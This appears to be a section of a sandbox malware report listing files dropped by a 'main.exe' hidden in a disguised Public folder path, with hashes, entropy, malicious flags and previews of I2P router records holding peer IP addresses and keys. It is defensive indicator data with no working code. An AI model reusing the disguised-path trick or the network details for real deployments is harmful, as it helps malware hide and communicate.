SSDEEP:24:kgXRoC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4amW6361QC5rYFI/qFIUERrt1tpSt:kgXGC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZC4ZH
MD5:C218A7A18E7F2E7AE2F25503F1BF263F
SHA1:0535639634601E1FD2FC29F1ACA8EDD071757859
SHA-256:3EDEF2C7FD73F6FFCF33CF5B232DA7466D0F496B967BA9AF5F6671A6977C907F
SHA-512:E1450A493018D841D320C6F6E80002A2CBBDB1E2B72593AB1BEF9C46347562BC0F77D7B9AF550BE0CD105CBF37BF07B4483A1E838C60E43407DDD9CF505134E7
Malicious:false
Preview:X.Kg.0..S..~...._.<=."..kb.....gK.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#K.T......E~..m.E.a...].z..W..#....)yy.H.y.}.K\;Y..4...+%.3..Y..............%............NTCP2.@.caps=.4;.s=,B2ltQ9ui1~Fl6Nl5PAYGco4XgfjIz4LpyWTkuVR-MSY=;.v=.2;..........NTCP2.@.caps=.6;.s=,B2ltQ9ui1~Fl6Nl5PAYGco4XgfjIz4LpyWTkuVR-MSY=;.v=.2;..........SSU2.{.caps=.4;.i=,oygZ1Afk64Q5kMgx2wOEh53WSuhw66rwk91vC4BaSlY=;.iexp0=.1726477524;.iexp1=.1726477514;.iexp2=.1726479178;.ih0=,~yTwCZd52sRiEfRNElRGwsNOiqHzy3LnrRLI7LSB7v0=;.ih1=,WiI-VZmbqNGnm-ZkR7c7AUFf3ofhlgUamXWpqgKVXH8=;.ih2=,Jzw5wbOpn0WaXDyPJZ6ei9a-7Xt4HMxEm-VLii4vrMs=;.itag0=.381221025;.itag1=.3671429319;.itag2=.3666351550;.s=,19GAU9gmXDU1rfBwn6W3nw-N-Ma33rAWfS0VSD-H0ns=;.v=.2;..........SSU2.q.caps=.6;.i=,oygZ1Afk64Q5kM
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1474
Entropy (8bit):6.6347750075747065
Encrypted:false
SSDEEP:24:uizzzzzzzzzwCLCAn3CzPtN+NHwZxmltTfPrgRLYQxHlSZZI7+:LzzzzzzzzzzY7fI/4RJFSfI7+
MD5:C9CD3EB6390E40DCEA6C2E2645792E45
SHA1:602FDBAB120B8FEDDC5BECB8ECBD28A5234EBD81
SHA-256:23C038580A9E0BA4F96DE43BA979D6278B2065EC7117DFE1B6A8061E78BCCC25
SHA-512:AC01C25CB80D63184A3C8551D9C7F1E7B51833CEBFA0364A2EC83D385223F169F221C1F95FE5FE692C9C12B3270BF98B7D1BD7CDD5D813A9AA05176143497EA6
Malicious:false
Preview:..<3...Rd....GW+o....`.......ZC.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.... ..|5.jG...v..DyRQWm.>E.._.....G.e..Z..,.p.B,.T].,..>...h..........................NTCP2.@.caps=.4;.s=,~7PXLqowkshXYjDbeHRR-LbW-cv9V0~DZTe3quNw2n4=;.v=.2;..........NTCP2.@.caps=.6;.s=,~7PXLqowkshXYjDbeHRR-LbW-cv9V0~DZTe3quNw2n4=;.v=.2;..........SSU2.z.caps=.4;.i=,tAVnTSSSmnigul6m7W5f4yuramliLAnCzDLOF5gMAGE=;.iexp0=.1726478963;.iexp1=.1726478957;.iexp2=.1726478956;.ih0=,-ZYUuq4kl9vffbV~HBsyOj7jx7BR1DuvCtsttZfPTMA=;.ih1=,~yTwCZd52sRiEfRNElRGwsNOiqHzy3LnrRLI7LSB7v0=;.ih2=,HZHPNSbv7zC6fRDx0e3AQWI6TGVzw9hiqfjJ6e4WRdk=;.itag0=.552072133;.itag1=.3023733026;.itag2=.463003325;.s=,pzhPI0On9ZUnt2H9H4EhsQVpeDBc5icCsx1gysYgtj0=;.v=.2;..........SSU2...caps=.6;.i=,tAVnTSSSmnigul6
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):988
Entropy (8bit):7.2887732225122575
Encrypted:false
SSDEEP:12://QRU1vb5n93f+6/R/wvZmoDvWT+39JDr2eqhxZOXxwiG4jd7bZJ31://QRUjP+8R/wx8Tc9tCeixMXeiG4jRFD
MD5:57BEB5800391A18586FD515D1CDD1E26
SHA1:D85BEA0F484119825ED3ACFE580425B0A56C1F95
SHA-256:BEE4E1B3676AF4A33780F33B20258B1DFF48745727F8E21E5249755ACFAF9D2B
SHA-512:C201BA973B9750CCBC23B2FEA56B7EE4585F8A3FA396B443001760B8EFD7F08B74B5A11E7ED3AA6637556D3F58DD7859E46DD9203482731FAD1EEE2D59C80522
Malicious:false
Preview:..8.*.".FKU.9..|..K%r<.%..d.m......N./..-..`...g... .T.`.\..Y.}Z........e.B.>.h,.~.u.i.l....o..+.......4!.5....6......1....T....rXu.%..f>....[a...i...[.....f.WC"..k.k..B.F...4.$.Z..,..>.#.1.......QM.....zV}..4...s.......&....Q.#4.o.f....p.CNqI9).....i.1.v.~..J.S....F.jEQ.W.E*.+.Z.......7cD%.\..z^Tm.q@....( .=.....A.#.`r.{.w)....%..a5..T.Hn.Sz...eA........Q...[t.D..........................NTCP2.@.caps=.4;.s=,Kfr77LacuXs7F0GS8CendxTmpiSmR1hPFW9WTsFrvS8=;.v=.2;..........SSU2.|.caps=.4;.i=,yMITurGqk1pjwJtX~ZMQiap2lttp8oOcjGPIAY8eL3M=;.iexp0=.1726478481;.iexp1=.1726478422;.iexp2=.1726478397;.ih0=,ujeJRIlhNHAUHmiC9y0nLx1gIoOHqEyKMjZByqzhLJ0=;.ih1=,Lid~-zEuyq2zyypj~J9-6QNgmAix6it3DB4EZJbD1O8=;.ih2=,~OTNd-HhgVbQoCBgfAR5Lzi9SFmGglG1~WpQWJS0cxM=;.itag0=.2625313873;.itag1=.2071815743;.itag2=.4154377392;.s=,423V23iOLVkUZ955rSMMGvwTfijOsEuT9meOGA46~lU=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.56;........^....<....B~9.tKt%.<u[...E..h.4.....3e.0I......'h...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):807
Entropy (8bit):6.689041002120418
Encrypted:false
SSDEEP:24:TWw8y8y8y8y8y8y8y8y8y8vn4LBlhLbU9ONu7H:TWJvvvvvvvvvv2zi7H
MD5:F625D6B1678C08A46964C09E435CBF48
SHA1:65D752C5B7EB1B8365AC6B86857F2F70E7F43ABB
SHA-256:9704B50EF9BEA49D00C79AF0CC4BFDAE94FEC36D6E697E380861403AA4407481
SHA-512:394671753D27402BA4C851E9E682AED22AFBE09D46AA50B17041EB5686391B6FCD2A4DD9FD60D0CBDE19C662C61DDEDD1DADC169030A3502554DEFF16AD6FAFE
Malicious:false
Preview:).!...Rs"t.Y.S._Ze.,A;W.W%...p-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88.-.K.pJm..[..S.).R......a...88. ...n...~.]\....l..^..../N...............q...........NTCP2.u.host=.68.65.178.44;.i=.UenFJERPzXaMSXrI0S56xg==;.port=.23154;.s=,Xxp8UpvBDdwvHHtzrGJ1g3nCUPC~Jc9gCTTpBhRyHy4=;.v=.2;..........SSU2...caps=.B;.host=.68.65.178.44;.i=,gZuNU9hvrHR0cH0mE-RFAAo~DVFW0KKJlqnBWLKt0Xc=;.port=.23154;.s=,zDPU8ZgJT6AijgUE8b4FnjSbRLKBjJFWu2a03IqvCAM=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.61;.j....(.o..Y./G{6.../.i.%m&.A....=..x...y.d.$z..Eq..&$m.....\.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):981
Entropy (8bit):7.219148852221832
Encrypted:false
SSDEEP:24:nmpp5n7b6Rw74vFB+/MKmau3GQdoq3GplSsuOs:m57bwQGFmeau3P6q32lpns
MD5:E7DDFD5A807921940EA31AB4B0AF3527
SHA1:C8ABBA4C1166B6424230232E9C56719BBB3FF085
SHA-256:2910A481762312754C4BB457F0C56AE6B3FB40CC120A21BDCAD14C7EB86F9371
SHA-512:167B7A312899635AC6544876F828696D155A27C4FA933889396FDE9353255DCDF697999E1F6785BD010CD56F1C26551229CD4C944EE9351932D297883C7D445E
Malicious:false
Preview:.r*...FQ-.[.W.3eD.:....8.r..qg$w"T....n..:...../.,..Ms...U.......u..R..Ok.c...>}.:L.S.L.Y.....t......'E.+....!...(..?n...M...0.x)J......,.OT.A.~(..u|._.........0.......^B..jxW(.1..t.F.C.uI.....9..R..........L......`.....T..Yeu.U..%[.(b.@...Ey.....:j.E.iX.A.6F.;.....#..W....z.7...UYi.k..e..J.w..T:....5...Tc.9.Iq..........!"....X..D......1.3.E#.S...C$Y....4.E...................`............NTCP2.v.host=.184.146.56.27;.i=.lvQhr3vTucDU6tQ5v3kAmA==;.port=.11190;.s=,zd2TNRRMF4EREK-dNaHw4YBXICOa9X~kIYBvQt7BhGc=;.v=.2;..........SSU._.caps=.BC;.host=.184.146.56.27;.key=,eRPTRAt3Ry9ztXeN2msAj9PbsI2DvIFdMzw1yUTUljs=;.port=.11190;..........NTCP2.l.host=.::1;.i=.lvQhr3vTucDU6tQ5v3kAmA==;.port=.11190;.s=,zd2TNRRMF4EREK-dNaHw4YBXICOa9X~kIYBvQt7BhGc=;.v=.2;..........SSU.U.caps=.BC;.host=.::1;.key=,OSDg-Mcso9ptgyrA8E6lId9jbw0Zr7jmbd7NrfLIZnQ=;.port=.11190;..,.caps=.XR;.netId=.2;.router.version=.0.9.54;c.K......mM..L.z.K..~.....(7....W.t.=z.b..wW.w...he@..K..k.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1383
Entropy (8bit):7.0565897363237
Encrypted:false
SSDEEP:24:4mGp7xcc17itK5ZPh06FhCCN/2Pae2M+I2b8:4mGp7xcQ7+K5ZZ0grNKB
MD5:A25FAB1A42D6B47F560B6C3771823524
SHA1:22DDB5A65D86E3F51710D3019AB6184490CE939D
SHA-256:75F5D8252C433464F1DDF3B5C4A98E627E7D97F3A8D0188198B692ADFA820832
SHA-512:2F067DA8730F6839C7C857A403926A52B33908F3FF0AA4811DAA9E2185B3DE730D1EED77601CF3518466979EA35496D04FF37C8EDD1312FBBF0BAD9C1B741525
Malicious:false
Preview:.@.p......Tg.-X..T4.v...O..B..........yI>..LPG.(...N..k..j."...d{..y..:......1Z~6$C...^.xo.W..e..cI....E6:.|.......a....$.3.+-....FK....;+..R.5gr!M.... lV........*....32<...7.qo..@.=`..p...e....*...00........7....M......=..}=.x..+....!...-.=.....I.y..x..+......D..t..xNs'*...Z)......L..%V...|.Y..r.C.....!....)....,e.q.2...s.zQ.I4.z.8C..P.[.o...5j...3n.d..pe...o5..............#...........NTCP2.v.host=.73.246.172.43;.i=.Z1ZN9ITGjVniPzabD4dB~w==;.port=.21102;.s=,uUil4PZoa5~Wax2Q1Awm6UZdk6PMFUQ3rhSEfCQDGzM=;.v=.2;..........SSU...caps=.B6;.i=,N92wX2YlS6~~Rv~OKi6cjlf4arAJIx2c4caV5DPOkMU=;.iexp0=.1726471699;.iexp1=.1726468720;.iexp2=.1726471699;.ih1=,4IA6IQTndd7uyhxZTBYjoNZQ9wXQTpZumO3ihwBIu90=;.ih2=,L3WS69O400AFmvzrOI7EGxlKnujsETrg2EmlhDMBG~k=;.ihost0='2404:8000:1001:acc7:38d9:5ead:8b33:9f10;.ikey0=,m18~YTChgli0qtmogVJZiYISVe5~fUzEmBIAcRpAUos=;.iport0=.20990;.itag0=.1324301159;.itag1=.1900813719;.itag2=.2061627723;.key=,rptleIeP-~qjqy8QGSdgjIUW2NbQFoHohSMFz9IsL~Q=;.mtu=.1
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):988
Entropy (8bit):6.650762114827123
Encrypted:false
SSDEEP:24:eGmvmvmvmvmvmvmvmvmvmJ7+zf9pgVrsSCT0r3fYOa8l:eG666666666KyzfjQvC2XNl
MD5:46282E454A55979A2C9E265F2D73AC7B
SHA1:D8725CFDD02FBF75895AAC8129353E29FEF4C093
SHA-256:7FB68598A6339E87143CDD7BD50778A7A7C7351D7FA082BE22BCB075DCDBAFFF
SHA-512:A9945A6183D9F092ED6E0DEAF4F8B414845C204612DA2196483EA19EE85B261CB011625E970D828C2F8A41B6B99F6EDD4F00CD36CBB16563253537D35C44283B
Malicious:false
Preview:2...x,.Y5.$...4.t..@..jE..o.%Spw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2pw+..U.S........._,...;;E...{2.8..gO(/NIa...c.M..E......s.o6.o.............o............SSU2.|.caps=.B4;.i=,nzAOeduv7R1pbJ6hngb6pT1X22X2Yv6kFnvQati9aiM=;.iexp0=.1726476395;.iexp1=.1726477079;.iexp2=.1726479510;.ih0=,r4WjQrHZ1Wb7V3oyLLgETiIn3gzntnTmzRPF8AHa2d0=;.ih1=,-X4kZiYpkwwPw6cbY~EPRT~41GK3QV6spEEg3m-jMNM=;.ih2=,AuDJCqtTNAdw0~cOwYndlFoYTFpk9iYI7pLP7G2g6J4=;.itag0=.1149547641;.itag1=.2430237461;.itag2=.294065463;.s=,gGblsukzCRUCAYndIVH0Z8h46hcYAHhU~nMYsvz30xY=;.v=.2;..........NTCP2.@.caps=.4;.s=,GVhjCBHVn4gUaPaWrj2ppy0rRIQvwZpriaS~4PZlbzQ=;.v=.2;..,.caps=.PU;.netId=.2;.router.version=.0.9.62;r..+./.Z"-.s,..9...P})../.>..%._4...o..o..$.....}.\.....4z..e..
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1168
Entropy (8bit):7.126340294696187
Encrypted:false
SSDEEP:24:I41LN+XYqLqeFoJNMmuxMUaJtJ4QOHtJ4akaQPQOg1kaQ9RFnn:Xx+IqsTMZzU+QON6akNQOg1kt5
MD5:D8D137238223739E7BE4713E41A8C1F8
SHA1:AA239511C9CE7E43CAC07FC11F5E2CC47CCB784E
SHA-256:302C9AC11350FE8DDE68B2BF1A22F05883B86DF3399F36D4FD6B5F6F45FBAE44
SHA-512:B55F14BEA52811B8A5A53FD229F381F91CE1FDE02AA7AE6F500B009C8F127632CC02D57F08B7A5267E2E3A7E567E16512D14F122092B4EFC8F71C5DA1EEDAE0F
Malicious:false
Preview:.."NC..?.6S.J..aG.K>.5W..A...i...,*i1#e-8........a.W.."?nZ./lSR...@..>x..@.v...+...xp.4{..H....HN.M.n.y.....)9..i..(.C[.".7.h.....h.U).sLhG<...e..K~.......'.c.P......6.c.~..-i.....t..-..(..N...&..W...C....].+h....T.X..;.).Jz...5.-....F....>....|%h.wMU.$.>.....,1......2..-U......@..[.w..d.-B<.f..8......i..>.y..@i..'.M.!.*s..=v..aF..Lo.%S.[..(!J....d.L.q.....I)*.@............................NTCP2.u.host=.45.76.244.95;.i=.cVppE0xZBteMm7e~o31uPA==;.port=.22681;.s=,Ja4SyOAu-jF~zLbgJfezBInFI4m9tkBtnUP4jJIJ2kc=;.v=.2;..........NTCP2...host=&2001:19f0:8001:279:182b:3182:ee80:edc4;.i=.cVppE0xZBteMm7e~o31uPA==;.port=.22681;.s=,Ja4SyOAu-jF~zLbgJfezBInFI4m9tkBtnUP4jJIJ2kc=;.v=.2;..........SSU2...caps=.BC;.host=.45.76.244.95;.i=,b0onWFWYMTO10j2qwlrT50dcZq6kuIQLezmKQnERIrA=;.port=.22681;.s=,jo0XqSanl6pTFwYOoS-OVmLrFbl41tKcoDKGvxUgySg=;.v=.2;..........SSU2...caps=.BC;.host=&2001:19f0:8001:279:182b:3182:ee80:edc4;.i=,b0onWFWYMTO10j2qwlrT50dcZq6kuIQLezmKQnERIrA=;.mtu=.1500;.port=.2268
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1289
Entropy (8bit):6.695763421207804
Encrypted:false
SSDEEP:24:52hmgmgmgmgmgmgmgmgmgmsv1Dhjl9jZqqrA9jZ3xqosanmYdFEqaj4Pwj5BAo5:5oNDNhr61xqLanzzPIAo5
MD5:2FB254C940145D88E79111771BABD4E3
SHA1:F75E979CAA3F5DC9979B2D09E5DFEFC49415600D
SHA-256:82FD7A16F15901F0F6FA72BCABD0BD0718FE042E4D1019488A715E86565B1B69
SHA-512:304D313BD2B05DD979658B2D83CF99BF72D2ED21E92E2F1D2A61A385B9ACDC322401A9EBA3570C2EB42D47FDB914E4A0932FC54D558C0986AEB5B45364C47F4F
Malicious:false
Preview:..<^%"..5.....I..0...#|.J......O.!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n..!.,Gow.IK.%...I.l...6......n.E..b.......Z.T.V7...E+..N0..n.&............."............SSU2...caps=.BC;.host=.161.65.240.191;.i=,f-DfngEaUAZUy~s9YRlRXho4OAcIKFqfZsK7P6eHSfQ=;.port=.18793;.s=,WXC-dApoOj1ShvhfNNRcCCMH0Qv5PjX3LUXURcX2eXs=;.v=.2;..........SSU2.|.caps=.B6;.i=,f-DfngEaUAZUy~s9YRlRXho4OAcIKFqfZsK7P6eHSfQ=;.iexp0=.1726472993;.iexp1=.1726475414;.iexp2=.1726474333;.ih0=,UHE8M0HAF6FU2CG~A7DiEp374OsBq9m8fyD0UZ9Uilk=;.ih1=,37rtNG9y5HwT0uA0uivKicstOogbuXMRj3DGILq4QWs=;.ih2=,fRad-tJvJR0V9Xw4kmNmRkbBL1UZyCMtY0nXOtIOCWc=;.itag0=.1588128416;.itag1=.1975651821;.itag2=.817846241;.s=,WXC-dApoOj1ShvhfNNRcCCMH0Qv5PjX3LUXURcX2eXs=;.v=.2;..........NTCP2.w.host=.161.65.240.191;
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):1153
Entropy (8bit):6.658532497176312
Encrypted:false
SSDEEP:12:UIqKulRj6tzVS3uOyj6tzOnlferT5Q3uOokAnlffrT5watL/fsy:UIjun6tUuOC6tqIrCuOontrdDt
MD5:7CDD7D18CA0E96D1251CB3AD48D0D013
SHA1:0CABA2558DD7905CCCADE79E0A9326315EEBC66C
SHA-256:47A052B59E887A2D7D6D09B69375B88593733DB9E1957367823D7ADDBE677BEC
SHA-512:21E8E5F376DAC49390B7F535C8BB395C84B8A19B7EC35929D493DF6A3D82730D6B7646CC7479FC429A1BDCD7233032436DD123043FEF6C3DBA27C7C1B354E93E
Malicious:false
Preview:Q.....iO..q............1;f..b..5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm5.....djL^..,..U.C.....".7.nm......`V.aM...s.......d..u..7..........................NTCP2.v.host=.217.10.112.72;.i=.GBZDmsro9JiP-AFsem7Fsg==;.port=.10706;.s=,J-8cpfcsOZS~aifhAIKuZS7ws7M7ZhEjeiJe2qOsyic=;.v=.2;..........NTCP2...host=.2001:4db8:2380:900::6f92:8427;.i=.GBZDmsro9JiP-AFsem7Fsg==;.port=.10706;.s=,J-8cpfcsOZS~aifhAIKuZS7ws7M7ZhEjeiJe2qOsyic=;.v=.2;..........SSU2...caps=.BC;.host=.217.10.112.72;.i=,AiHBrKg1UgnZxwCnKqYu9I0zDJ5Ir~1Ztxy2faZt~Nk=;.port=.10706;.s=,PNMPqFPAftXdkMnbiLFpmhpm6sP2SQKjDIvWtRe87SI=;.v=.2;..........SSU2...caps=.BC;.host=.2001:4db8:2380:900::6f92:8427;.i=,AiHBrKg1UgnZxwCnKqYu9I0zDJ5Ir~1Ztxy2faZt~Nk=;.mtu=.1500;.port=.10706;.s=,PNMPqFPAft
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):808
Entropy (8bit):6.527414692063211
Encrypted:false
SSDEEP:6:ceGGzjGzjGzjGzjGzjGzjGzjGzjGzjOutXQsShDFFY0hTyTxFglrUdzP4IylljPU:tQsSZFXFyfglr9TgjgSdmgdp/2YFh9Wy
MD5:E82B6EC77F7D11E1B7744D0E226C1226
SHA1:F359C0DDC2A92994F79FDE434A7E835306218483
SHA-256:030AFA5A5F72894A4D012060D94E8204D38EB4A73D5CA67785FF99DB74B85F9A
SHA-512:58A6D03E1827CF3B47D070FC094331F454A4315978C653CFDA64DBFF67A1A594D2D9B7CEC406D3FAB97FD6D763F6A90A7526C408B3CFF0F0696EF82A882842A6
Malicious:false
Preview:...j...0.}iA0..dww.<.Ei.......d.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i.r....i.l;k.0e...uj|d..T5r.....i......@=.=......9...lxb...M..E.............W............NTCP2.u.host=.24.51.216.45;.i=.s5cLrUa4DhQhvb-W6CGxTg==;.port=.27375;.s=,LLKlwv-ycdYaUUxIwSJa3qOyxLb8uaHr6rl5VSLC-UI=;.v=.2;..........SSU2...caps=.BC;.host=.24.51.216.45;.i=,M6SRX0KhpkzFzHNxQQ3K40iHUjsR5~oXgxB7CwlKJ8Q=;.port=.27375;.s=,S5kgbDQyAzqljRJDEFSqLppdTGRvVda48BPKchFI9go=;.v=.2;..,.caps=.NR;.netId=.2;.router.version=.0.9.63;..r....?1"...z.......s=...Z..v..D.$....k...6.;......b.2.o..JL.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):80
Entropy (8bit):6.012492001110314
Encrypted:false
SSDEEP:3:0fbCe4qBZNaFDYAHvR0W87HWDcbwn:0fb6qBrahYAG4n
MD5:2980894CA47F632501F9778DD034B7AF
SHA1:2932C4E107F9EFD3CBD4B0DC4677FC80AD86B5A2
SHA-256:032D534BF1766DB600D7C420F6FDB18701D429DC8DCC80EA90E845598F6E74B2
SHA-512:F69D8DFE593796D6669FDC2374BBD57689D7B93F3FB84747454030C986095DA67C95589C95A8474C84A0C9B756680EDFE876C4CD906D8C9488C76D7BA9B2C1DC
Malicious:false
Preview:.$3..$.g..{......r5ro.<t.}\..yj..V.VJ4..ebJt..3o|.....g.....K.3&.vq..y..@._.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):809
Entropy (8bit):6.643395305096442
Encrypted:false
SSDEEP:24:qUdYgYgYgYgYgYgYgYgYgYjFrrmPHkM0bMmV0wv2zK:qh777777777jUHLGHvt
MD5:7A52BAA4D60D72495AAD3450E27895C6
SHA1:74A834C348EBD2FAA7AF3CC213311280C1431339
SHA-256:2610EC065EBA572CF65297A7E777E619F61B4347A3AB52E89F846F8373B0DBC9
SHA-512:755D000CEB65ADDEA44574FCCCA536EBC3EB7AA759D09F65ED426839309FCABE62E49C0F1684C7F0CBBBFE9A2A25DC76F14E9A6A17D7B424C62D587AE181128D
Malicious:true
Preview:.hk.Y..e.X&.H.d..u...l....-Y...`.]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G..;....U......z?..w&JRS^..Y.F.............fp.............NTCP2.@.caps=.4;.s=,hiQz-rsk4ZZn8cN7HQWe-xDRcjVyb6o8dIB9XL22eWo=;.v=.2;..........SSU2...caps=.4;.i=,ul5HQNf46JpZg7pIKr8af6N4XBr6M2LZ43ahhjr8I1A=;.iexp0=.1727197652;.ih0=,e-jkj5GzeRho0jlflrONZhkaP218DvSYjr3-qgPyTdU=;.itag0=.669307908;.s=,fq3EXDEHGl4TIU2LW4s8BYz2ihII-Z0PFcA72au70lw=;.v=.2;..,.caps=.LU;.netId=.2;.router.version=.0.9.60;..dcn.9px......:.}cr..,...T.....Z0"....9..q.........H...d.
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:DOS executable (COM, 0x8C-variant)
Category:dropped
Size (bytes):455
Entropy (8bit):6.191554831641883
Encrypted:false
SSDEEP:12:yRRydYYZVYYZVYYZVYYZVYYZVYYZVYYZVYYZVYYZVYYmXuUmILsvR/qnCo:qUdYgYgYgYgYgYgYgYgYgYjd/LsJwB
MD5:228B90FEB6CE5D7E63B11950AD27606A
SHA1:EFEE67E2267E3902B585F98E864812BDBA17D32D
SHA-256:03BB3C0370F3D7A62C8E662492AC72C89F5C5E80B892BCA15B6C810FFD6381D5
SHA-512:B63CA4EB60877BE8A522FF674C9DC1A24A013715951963167178F3D981D67AFA166A44F8DA80ACE2BA06ACF2B56F662FEEA2AA0252BBCBBF3B7AFE793C140D15
Malicious:true
Preview:.hk.Y..e.X&.H.d..u...l....-Y...`.]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G...]r.....a..B.f21._.i[Na..h68.G..;....U......z?..w&JRS^..Y.F..........Q<..~....9..............xyk.O..1E...B.Ot.t..ay.A-.s:.+2...
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:data
Category:dropped
Size (bytes):96
Entropy (8bit):6.178508854797682
Encrypted:false
SSDEEP:3:sv7ou+npTveIx5BUphaatqyP06jG7/ATEj41n:sjou+npTWXp4EqN6jG7ATEj41
MD5:49B68D2346BD852BE0A77D4EC03B235B
SHA1:847F9434472A8B4100A417D03F160D2A36E01C93
SHA-256:55A5B51EEE1A391829CCC67DDBF23C8A5227C45BC22A4FFCEFE3ECB251530A15
SHA-512:5044C6248FD8A5FE4A512877ECEAED23B1C9EBE39036BE9C8AD4432D63591BB3B8A485B390B60972E0413E01ECCF32129C1CEF6FD77114E0A9EE1D60CA4058D2
Malicious:false
Preview:~..\1..^.!M.[.<...........;...\.8b....ULD.q..[..k.]....c.R.).S.^G@...Y..H*....x\..3b..v..:.#P
Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
File Type:PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):9146880
Entropy (8bit):6.674868432808522
Encrypted:false
SSDEEP:196608:DiRu5DnWLX6Cs3E1CPwDvt3uF8c339CME:DiRsCKCsU1CPwDvt3uFd9CME
MD5:676064A5CC4729E609539F9C9BD9D427
SHA1:F77BA3D5B6610B345BFD4388956C853B99C9EB60
SHA-256:77D203E985A0BC72B7A92618487389B3A731176FDFC947B1D2EAD92C8C0E766B
SHA-512:4C876E9C1474E321C94EA81058B503D695F2B5C9DCA9182C515F1AE6DE065099832FD0337D011476C553958808C7D6F748566734DEEE6AF1E74B45A690181D02
Malicious:true
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
